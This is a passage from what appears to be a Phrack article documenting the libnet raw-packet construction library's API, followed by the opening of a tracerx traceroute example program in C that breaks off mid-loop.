RV on success: number of bytes written
RV on failure: -1
Reentrant: Yes
Arguments: 1 - socket file descriptor
2 - pointer to the packet buffer containing an IP datagram
3 - total packet size
libnet_write_ip() writes an IP packet to the network. The first argument
is the socket created with a previous call to libnet_open_raw_sock, the
second is a pointer to a buffer containing a complete IP datagram, and
the third argument is the total packet size. The function returns the
number of bytes written upon success or -1 on error (with errno containing
the reason).
int libnet_write_link_layer(struct link_int *, const u_char *, u_char *, int);
RV on success: number of bytes written
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an opened link interface structure
2 - pointer to the network device
3 - pointer to the packet buffer
4 - total packet size
libnet_write_link_layer() writes a link-layer frame to the network. The
first argument is a pointer to a filled-in libnet_link_int structure,
the next is a pointer to the network device, the third is the raw packet
and the last is the packet size. Returned is the number of bytes written
or -1 on error.
int libnet_do_checksum(u_char *, int, int);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to the packet buffer
2 - protocol number of packet type (symbolic constant)
3 - total packet size
libnet_do_checksum() calculates the checksum for a packet. The first
argument is a pointer to a fully built IP packet. The second is the
transport protocol of the packet and the third is the packet length (not
including the IP header). The function calculates the checksum for the
transport protocol and fills it in at the appropriate header location
(this function should be called only after a complete packet has been
built).
Note that when using raw sockets the IP checksum is always computed by
the kernel and does not need to done by the user. When using the link
layer interface the IP checksum must be explicitly computed (in this
case, the protocol would be of type IPPROTO_IP and the size would include
IP_H). The function returns 1 upon success or -1 if the protocol is of
an unsupported type. Currently supported are:
Value Description
---------------------------
IPPROTO_TCP TCP
IPPROTO_UDP UDP
IPPROTO_ICMP ICMP
IPPROTO_IGMP IGMP
IPPROTO_IP IP
int libnet_build_arp(u_short, u_short, u_short, u_short, u_short, u_char *,
u_char *, u_char *, u_char *, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - hardware address format (ARPHRD_ETHER)
2 - protocol address format
3 - length of the hardware address
4 - length of the protocol address
5 - ARP operation type (symbolic constant)
6 - sender's hardware address
7 - sender's protocol address
8 - target's hardware address
9 - target's protocol address
10 - pointer to packet payload
11 - packet payload size
12 - pointer to pre-allocated packet memory
libnet_build_arp() constructs an ARP (RARP) packet. At this point in the
library, the function only builds ethernet/ARP packets, but this will be
easy enough to change (whenever I get around to it). The first nine
arguments are standard ARP header arguments, with the last three being
standard libnet packet creation arguments. The ARP operation type
should be one of the following symbolic types:
Value Description
-------------------------------
ARPOP_REQUEST ARP request
ARPOP_REPLY ARP reply
ARPOP_REVREQUEST RARP request
ARPOP_REVREPLY RARP reply
ARPOP_INVREQUEST request to identify peer
ARPOP_INVREPLY reply identifying peer
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 is no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ARP packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_dns(u_short, u_short, u_short, u_short, u_short, u_short,
const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet id
2 - control flags
3 - number of questions
4 - number of answer resource records
5 - number of authority resource records
6 - number of additional resource records
7 - pointer to packet payload
8 - packet payload size
9 - pointer to pre-allocated packet memory
libnet_build_dns() constructs a DNS packet. The static DNS fields are
included as the first six arguments, but the optional variable length
fields must be included with the payload interface.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire DNS packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_ethernet(u_char *, u_char *, u_short, const u_char *, int,
u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to the destination address (string)
2 - pointer to the source address (string)
3 - ethernet packet type (symbolic constant)
4 - pointer to packet payload
5 - packet payload size
6 - pointer to pre-allocated packet memory
libnet_build_ethernet() constructs an ethernet packet. The destination
address and source address arguments are expected to be arrays of
unsigned character bytes. The packet type should be one of the
following:
Value Description
-------------------------------
ETHERTYPE_PUP PUP protocol
ETHERTYPE_IP IP protocol
ETHERTYPE_ARP ARP protocol
ETHERTYPE_REVARP Reverse ARP protocol
ETHERTYPE_VLAN IEEE VLAN tagging
ETHERTYPE_LOOPBACK Used to test interfaces
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ethernet
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_echo(u_char, u_char, u_short, u_short, const u_char *,
int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - pointer to packet payload
6 - packet payload size
7 - pointer to pre-allocated packet memory
libnet_build_icmp_echo() constructs an ICMP_ECHO / ICMP_ECHOREPLY packet.
The packet type should be ICMP_ECHOREPLY or ICMP_ECHO and the code should
be 0.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_mask(u_char, u_char, u_short, u_short, u_long,
const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - IP netmask
6 - pointer to packet payload
7 - packet payload size
8 - pointer to pre-allocated packet memory
libnet_build_icmp_mask() constructs an ICMP_MASKREQ / ICMP_MASKREPLY
packet. The packet type should be either ICMP_MASKREQ or ICMP_MASKREPLY
and the code should be 0. The IP netmask argument should be a 32-bit
network-byte ordered subnet mask.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_unreach(u_char, u_char, u_short, u_char, u_short,
u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - original IP length
4 - original IP TOS
5 - original IP id
6 - original IP fragmentation bits
7 - original IP time to live
8 - original IP protocol
9 - original IP source address
10 - original IP destination address
11 - pointer to original IP payload
12 - original IP payload size
13 - pointer to pre-allocated packet memory
libnet_build_icmp_unreach() constructs an ICMP_UNREACH packet. The 3rd
through the 12th arguments are used to build the IP header of the original
packet that caused the error message (the ICMP unreachable). The packet
type should be ICMP_UNREACH and the code should be one of the following:
Value Description
-------------------------------------------
ICMP_UNREACH_NET network is unreachable
ICMP_UNREACH_HOST host is unreachable
ICMP_UNREACH_PROTOCOL protocol is unreachable
ICMP_UNREACH_PORT port is unreachable
ICMP_UNREACH_NEEDFRAG fragmentation required but DF bit was set
ICMP_UNREACH_SRCFAIL source routing failed
ICMP_UNREACH_NET_UNKNOWN network is unknown
ICMP_UNREACH_HOST_UNKNOWN host is unknown
ICMP_UNREACH_ISOLATED host / network is isolated
ICMP_UNREACH_NET_PROHIB network is prohibited
ICMP_UNREACH_HOST_PROHIB host is prohibited
ICMP_UNREACH_TOSNET IP TOS and network
ICMP_UNREACH_TOSHOST IP TOS and host
ICMP_UNREACH_FILTER_PROHIB prohibitive filtering
ICMP_UNREACH_HOST_PRECEDENCE host precedence
ICMP_UNREACH_PRECEDENCE_CUTOFF host precedence cut-off
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_timeexceed(u_char, u_char, u_short, u_char, u_short,
u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - original IP length
4 - original IP TOS
5 - original IP id
6 - original IP fragmentation bits
7 - original IP time to live
8 - original IP protocol
9 - original IP source address
10 - original IP destination address
11 - pointer to original IP payload
12 - original IP payload size
13 - pointer to pre-allocated packet memory
libnet_build_icmp_timeexceed() contructs an ICMP_TIMEXCEED packet. This
function is identical to libnet_build_icmp_unreach with the exception of
the packet type and code. The packet type should be either
ICMP_TIMXCEED_INTRANS for packets that expired in transit (TTL expired) or
ICMP_TIMXCEED_REASS for packets that expired in the fragmentation
reassembly queue.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 is no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_icmp_redirect(u_char, u_char, u_long, u_short, u_char,
u_short, u_short, u_char, u_char, u_long, u_long, const u_char *, int,
u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - IP address of the gateway
4 - original IP length
5 - original IP TOS
6 - original IP id
7 - original IP fragmentation bits
8 - original IP time to live
9 - original IP protocol
10 - original IP source address
11 - original IP destination address
12 - pointer to original IP payload
13 - original IP payload size
14 - pointer to pre-allocated packet memory
libnet_build_icmp_redirect() constructs an ICMP_REDIRECT packet. This
function is similar to libnet_build_icmp_unreach, the differences being the
type and code and the addition of an argument to hold the IP address of the
gateway that should be used (hence the redirect). The packet type should be
ICMP_REDIRECT and the code should be one of the following:
Value Description
-----------------------------------
ICMP_UNREACH_NET redirect for network
ICMP_UNREACH_HOST redirect for host
ICMP_UNREACH_PROTOCOL redirect for type of service and network
ICMP_UNREACH_PORT redirect for type of service and host
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 is no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_icmp_timestamp(u_char, u_char, u_short, u_short, n_time,
n_time, n_time, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - originate timestamp
6 - receive timestamp
7 - transmit timestamp
8 - pointer to packet payload
9 - packet payload size
10 - pointer to pre-allocated packet memory
libnet_build_icmp_timestamp() constructs an ICMP_TSTAMP / ICMP_TSTAMPREPLY
packet. The packet type should be ICMP_TSTAMP or ICMP_TSTAMPREPLY and the
code should be 0.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 is no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_igmp(u_char type, u_char code, u_long ip, const u_char *,
int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type
2 - packet code
3 - IP address
4 - pointer to packet payload
5 - packet payload size
6 - pointer to pre-allocated packet memory
libnet_build_igmp() constructs an IGMP packet. The packet type should be
one of the following:
Value Description
---------------------------------------
IGMP_MEMBERSHIP_QUERY membership query
IGMP_V1_MEMBERSHIP_REPORT version 1 membership report
IGMP_V2_MEMBERSHIP_REPORT version 2 membership report
IGMP_LEAVE_GROUP leave-group message
The code, which is a routing sub-message, should probably be left to 0,
unless you know what you're doing.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer which points to memory which is supposed to be pre-allocated
points to NULL.
int libnet_build_ip(u_short, u_char, u_short, u_short, u_char, u_char,
u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet length (not including the IP header)
2 - type of service (symbolic constant)
3 - packet id
4 - fragmentation bits (symbolic constant) / offset
5 - time to live
6 - protocol (symbolic constant)
7 - source address
8 - destination address
9 - pointer to packet payload
10 - packet payload size
11 - pointer to pre-allocated packet memory
libnet_build_ip() constructs the mighty IP packet. The fragmentation field
may be 0 or contain some combination of the following:
Value Description
-------------------
IP_DF Don't fragment this datagram (this is only valid when alone)
IP_MF More fragments on the way (OR'd together with an offset value)
The IP_OFFMASK is used to retrieve the offset from the fragmentation field.
IP packets may be no larger than IP_MAXPACKET bytes.
The source and destination addresses need to be in network-byte order.
The payload interface should only be used to construct an arbitrary or
non-supported type IP datagram. To construct a TCP, UDP, or similar
type packet, use the relevant libnet_build function.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_rip(u_char, u_char, u_short, u_short, u_short, u_long,
u_long, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - command (symbolic constant)
2 - version (symbolic constant)
3 - routing domain (or zero)
4 - address family
5 - route tag (or zero)
6 - IP address
7 - netmask (or zero)
8 - next hop IP address (or zero)
9 - metric
10 - pointer to packet payload
11 - packet payload size
12 - pointer to pre-allocated packet memory
libnet_build_rip() constructs a RIP packet. Depending on the version of
RIP you are using, packet fields are slightly different. The following
chart highlights these differences:
Argument Version 1 Version 2
-----------------------------------------
first command command
second RIPVER_1 RIPVER_2
third zero routing domain
fourth address family address family
fifth zero route tag
sixth IP address IP address
seventh zero subnet mask
eighth zero next hop IP
ninth metric metric
The RIP commands should be one of the following:
Value Description
-------------------------------
RIPCMD_REQUEST RIP request
RIPCMD_RESPONSE RIP response
RIPCMD_TRACEON RIP tracing on
RIPCMD_TRACEOFF RIP tracing off
RIPCMD_POLL RIP polling
RIPCMD_POLLENTRY
RIPCMD_MAX
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer that points to memory which is supposed to be pre-allocated
points to NULL.
int libnet_build_tcp(u_short, u_short, u_long, u_long, u_char, u_short,
u_short, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - source port
2 - destination port
3 - sequence number
4 - acknowledgement number
5 - control flags (symbolic constant)
6 - window size
7 - urgent pointer
8 - pointer to packet payload
9 - packet payload size
10 - pointer to pre-allocated packet memory
libnet_build_tcp() constructs a TCP packet. The control flags should be
one or more of the following (OR'd together if need be):
Value Description
-----------------------
TH_URG urgent data is present
TH_ACK acknowledgement number field should be checked
TH_PSH push this data to the application as soon as possible
TH_RST reset the referenced connection
TH_SYN synchronize sequence numbers
TH_FIN finished sending data (sender)
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to memory which is supposed to be pre-allocated points to NULL.
int libnet_build_udp(u_short, u_short, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - source port
2 - destination port
3 - pointer to packet payload
4 - packet payload size
5 - pointer to pre-allocated packet memory
libnet_build_udp() constructs a UDP packet. Please remember that UDP
checksums are considered mandatory by the host requirements RFC.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to memory which is supposed to be pre-allocated points to NULL.
int libnet_insert_ipo(struct ipoption *opt, u_char opt_len, u_char *buf);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an IP options structure (filled in)
2 - length of the options
3 - pointer to a complete IP datagram
libnet_insert_ipo() inserts IP options into a pre-built IP packet.
Supplied is a pointer to an ip options structure, the size of this options
list, and a pointer the pre-built packet. The options list should be
constructed as they will appear on the wire, as they are simply inserted
into the packet at the appropriate location.
The function returns -1 if the options would result in packet too large
(greater then 65535 bytes), or if the packet buffer is NULL. It is an
unchecked runtime error for the user to have not allocated enough heap
memory for the IP packet plus the IP options.
int libnet_insert_tcpo(struct tcpoption *, u_char, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an TCP options structure (filled in)
2 - length of the options
3 - pointer to a complete TCP packet
libnet_insert_tcpo() inserts TCP options into a pre-built IP/TCP packet.
Supplied is a pointer to a tcp options structure, the size of this options
list, and a pointer the pre-built packet. The options list should be
constructed as they will appear on the wire, as they are simply inserted
into the packet at the appropriate location.
The function returns -1 if the options would result in packet too large
(greater then 65535 bytes), if the packet isn't an IP/TCP packet, if the
options list if longer than 20 bytes, or if the packet buffer is NULL. It
is an unchecked runtime error for the user to have not allocated enough
heap memory for the IP/TCP packet plus the IP options.
Support Functions
-----------------
int libnet_seed_prand();
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: NA
libnet_seed_prand() seeds the pseudo-random number generator. The function
is basically a wrapper to srandom. It makes a call to gettimeofday to get
entropy. It can return -1 if the call to gettimeofday fails (check errno).
It otherwise returns 1.
u_long libnet_get_prand(int);
RV on success: 1
RV on failure: NA
Reentrant: yes
Arguments: 1 - maximum size of pseudo-random number desired (symbolic
constant)
libnet_get_prand() generates a psuedo-random number. The range of the
returned number is controlled by the function's only argument:
Value Description
-------------------
PR2 0 - 1
PR8 0 - 255
PR16 0 - 32767
PRu16 0 - 65535
PR32 0 - 2147483647
PRu32 0 - 4294967295
The function does not fail.
void libnet_hex_dump(u_char *buf, int len, int swap, FILE *stream);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - packet to dump
2 - packet length
3 - byte swap flag
4 - previously opened stream to dump to the packet to
libnet_hex_dump() prints out a packet in hexadecimal. It will print the
packet as it appears in memory, or as it will appear on the wire,
depending on the value of the byte-swap flag.
The function prints the packet to a previously opened stream (such as
stdout).
Note that on big-endian architectures such as Solaris, the packet will
appear the same in memory as it will on the wire.
int libnet_plist_chain_new(struct libnet_plist_chain **, char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
2 - pointer to the token list
libnet_plist_chain_new() constructs a new libnet port-list chain. A libnet
port-list chain is a fast and simple way of implementing port-list ranges
(useful for applications that employ a list of ports - like a port scanner).
You'll see naive implementations that allocate an entire array of 65535
bytes and fill in the desired ports one by one. However, we only really
need to store the beginning port and the ending port, and we can
efficiently store multiple port ranges (delimited by commas) by using a
linked list chain with each node holding the beginning and ending port for
a particular range. For example, The port range `1-1024` would occupy
one node with the beginning port being 1 and the ending port being 1024.
The port range `25,110-161,6000` would result in 3 nodes being allocated.
Single ports are taken as single ranges (port 25 ends up being 25-25).
A port list range without a terminating port (port_num - ) is
considered shorthand for (port_num - 65535).
The arguments are a pointer to libnet_plist_chain pointer (which will end
up being the head of the linked list) which needs to deference an allocated
libnet_plist_chain structure and pointer to the port-list (token-list)
itself.
The function checks this character port list for valid tokens
(1234567890,- ) and returns an error if an unrecognized token is
found.
Upon success the function returns 1, and head points to the newly formed
port-list (and also contains the number of nodes in the list. If an error
occurs (an unrecognized token is found or malloc fails) -1 is returned and
head is set to NULL.
libnet_plist_chain_next_pair() should be used to extract port list pairs.
int libnet_plist_chain_next_pair(struct libnet_plist_chain *, u_short *,
u_short *);
RV on success: 1, 0
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
2 - pointer to the beginning port (to be filled in)
3 - pointer to the ending port (to be filled in)
libnet_plist_chain_next_pair() fetches the next pair of ports from the
list. The function takes a pointer to the head of the prebuilt list and a
pointer to a u_short that will contain the beginning port and a pointer to
a u_short that will contain the ending port.
The function returns 1 and fills in these values if there are nodes
remaining, or if the port list chain is exhausted, it returns 0. If
an error occurs (the libnet_plist_chain pointer is NULL) the function
returns -1.
int libnet_plist_chain_dump(struct libnet_plist_chain *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_dump() dumps the port-list chain referenced by the
argument. The function prints the list to stdout (it's mainly meant as a
debugging tool). It returns 1 upon success or if an error occurs (the
libnet_plist_chain pointer is NULL) the function returns -1.
u_char *libnet_plist_chain_dump_string(struct libnet_plist_chain *);
RV on success: pointer to the token list as a string
RV on failure: NULL
Reentrant: no
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_dump_string() returns the port-list chain referenced by
the argument as a string. It returns the port list string upon success or
if an error occurs (the libnet_plist_chain pointer is NULL) the function
returns NULL.
void libnet_plist_chain_free(struct libnet_plist_chain *);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_free() frees the memory associated with the libnet
port list chain.
----[ 6] Conclusion
Libnet is a powerful and useful library. Use it well and you will prosper
and people will like you. Women will want you, men will want to be you (swap
genders as required).
----[ 7] URLs
Libnet Homepage: http://www.packetfactory.net/libnet
Libnet Project Page: http://www.packetfactory.net
Libnet Mailing List: libnet-subscribe@libnetdevel.com
(mailing list is, as of 09.09.99 down for unknown
reasons. It will be back up soon. Keep track of
it on the webpage.)
TracerX http://www.packetfactory.net/tracerx
----[ 8] References
[1] LBNL, Network Research Group, "libpcap", http://ee.lbl.gov
[2] Stevens, W. Richard, "UNIX Network Programming, vol. I, 2nd ed.",
Prentice Hall PTR, 1998
[3] Hanson, David R., "C Interfaces and Implementations", Addison-Wesley,
1997
----[ 9] Example code
No writ on a C library would be complete without C code. The following
heavily commented example is a work in progress. It's actually an
incomplete
program that we were working on called tracerx (a planned enhanced
traceroute -- http://www.packetfactory.net/tracerx).
The packet injection portion is complete and operational and
should prove to be a good example of how to write reasonably complex code
on top of libnet (and libpcap). Included is the current tracerx tree
including the autoconf files such that you can build it on your machine
and play with it.
<++> P55/Tracerx/tx_framework.c !a2064076
/*
* $Id: tx_framework.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_framework.c - main tracerx toplevel routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_packet_inject.h"
#include "./tx_packet_capture.h"
#include "./tx_packet_filter.h"
int
tx_init_control(struct tx_control **tx_c)
{
/*
* Heap memory for the control structure.
*/
*tx_c = (struct tx_control *)malloc(sizeof(struct tx_control));
if (!(*tx_c))
{
return (-1);
}
/*
* Heap memory for the libnet link interface structure.
*/
(*tx_c)->l =
(struct libnet_link_int *)malloc(sizeof(struct libnet_link_int));
if (!((*tx_c)->l))
{
return (-1);
}
if (libnet_seed_prand() == -1)
{
tx_error(CRITICAL, "Can't initialize the random number generator\n");
return (-1);
}
/*
* Initialize defaults to mimic a standard traceroute scan.
*/
(*tx_c)->device = NULL; /* set later */
(*tx_c)->current_ttl = 1; /* start at 1 hop */
(*tx_c)->max_ttl = 30; /* end at 30 */
(*tx_c)->initial_sport = libnet_get_prand(PRu16);
(*tx_c)->initial_dport = 32768 + 666; /* standard tr */
(*tx_c)->id = getpid(); /* packet id */
(*tx_c)->use_name = 1; /* resolve IP addresses */
(*tx_c)->packet_size = PACKET_MIN; /* IP + UDP + payload */
(*tx_c)->ip_tos = 0; /* set later */
(*tx_c)->ip_df = 0; /* set later */
(*tx_c)->packet_offset = 0; /* set later */
(*tx_c)->protocol = IPPROTO_UDP; /* UDP */
(*tx_c)->probe_cnt = 3; /* 3 probes */
(*tx_c)->verbose = 0; /* Sssssh */
(*tx_c)->reading_wait = 5; /* 5 seconds */
(*tx_c)->writing_pause = 0; /* no writing pause */
(*tx_c)->host = 0; /* set later */
(*tx_c)->packets_sent = 0; /* set later */
(*tx_c)->packets_reply = 0; /* set later */
(*tx_c)->l = NULL; /* pcap descriptor */
(*tx_c)->p = NULL; /* libnet descriptor */
memset(&(*tx_c)->sin, 0, sizeof(struct sockaddr_in));
return (1);
}
int
tx_init_network(struct tx_control **tx_c, char *err_buf)
{
/*
* Set up the network interface and determine our outgoing IP address.
*/
if (libnet_select_device(&(*tx_c)->sin, &(*tx_c)->device, err_buf) == -1)
{
return (-1);
}
/*
* Open the libnet link-layer injection interface.
*/
(*tx_c)->l = libnet_open_link_interface((*tx_c)->device, err_buf);
if (!((*tx_c)->l))
{
return (-1);
}
/*
* Open the pcap packet capturing interface.
*/
(*tx_c)->p = pcap_open_live((*tx_c)->device, PCAP_BUFSIZ, 0, 500, err_buf);
if (!((*tx_c)->p))
{
return (-1);
}
/*
* Verify minimum packet size and set the pcap filter.
*/
switch ((*tx_c)->protocol)
{
case IPPROTO_UDP:
if ((*tx_c)->packet_size < IP_H + UDP_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + UDP_H + TX_P);
(*tx_c)->packet_size = IP_H + UDP_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_UDP, tx_c) == -1)
{
return (-1);
}
break;
case IPPROTO_TCP:
if ((*tx_c)->packet_size < IP_H + TCP_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + TCP_H + TX_P);
(*tx_c)->packet_size = IP_H + TCP_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_TCP, tx_c) == -1)
{
return (-1);
}
break;
case IPPROTO_ICMP:
if ((*tx_c)->packet_size < IP_H + ICMP_ECHO_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + ICMP_ECHO_H + TX_P);
(*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_ICMP, tx_c) == -1)
{
return (-1);
}
break;
default:
sprintf(err_buf, "Unknown protocol, can't set packetsize or filter\n");
return (-1);
}
/*
* Allocate packet header memory.
*/
if (libnet_init_packet(
(*tx_c)->packet_size + ETH_H, /* include space for link layer */
&(*tx_c)->tx_packet) == -1)
{
sprintf(err_buf, "libnet_init_packet: %s\n", strerror(errno));
return (-1);
}
return (1);
}
int
tx_do_scan(struct tx_control **tx_c)
{
int i, j;
/*
* Build a probe `template`. This template will be used for each
* probe sent and it will be updated each pass through the main loop.
*/
tx_packet_build_probe(tx_c);
/*
* Increment the hopcounter and update packet template.
*/
for (i = 0; i < (*tx_c)->max_ttl; i++)
{
/*
* Send a round of probes.
*/
for (j = 0; j < (*tx_c)->probe_cnt; j++)
{
